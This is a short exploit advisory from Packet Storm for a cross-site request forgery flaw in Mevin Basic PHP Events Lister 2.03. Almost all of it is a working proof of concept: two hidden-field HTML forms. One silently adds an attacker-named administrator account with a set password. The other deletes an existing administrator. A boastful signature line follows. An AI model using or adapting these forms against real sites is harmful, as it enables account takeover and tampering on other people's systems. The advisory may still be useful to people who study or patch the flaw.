Mevin Basic PHP Events Lister version 2.03 suffers from a cross site request forgery vulnerability.
aa882d7076209604b6cf3b6c3f1b5957ecf94cd8298d402038ef20b840994320#######################################################
# Author: Crazy_Hacker
# Script: Mevin Basic PHP Events Lister v2.03
# Exploit type: CSRF Vulnerability [Add & Delete Admin]
# Download: http://www.mevin.com/downloads/Basic-php-events-lister2.03.zip
# Risk: High
# Contact: jy8@hotmail.com
#######################################################
<form name="setup" action="http://127.0.0.1/events2/admin/user_add.php" method="post">
<input name="uname" type="hidden" value="Crazy_Hacker" />
<input name="pword" type="hidden" value="PWNED!!" />
<input type=submit name=submit value="Add Admin">
</form>
<form action="http://localhost/events2/admin/user_delete.php?id=8" method="post">
<input type="hidden" name="ud_id" value="8">
<input type="submit" name="submit" value="Delete Admin">
</form>
\\// S3crity just Suck5 \\//
#EOF
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed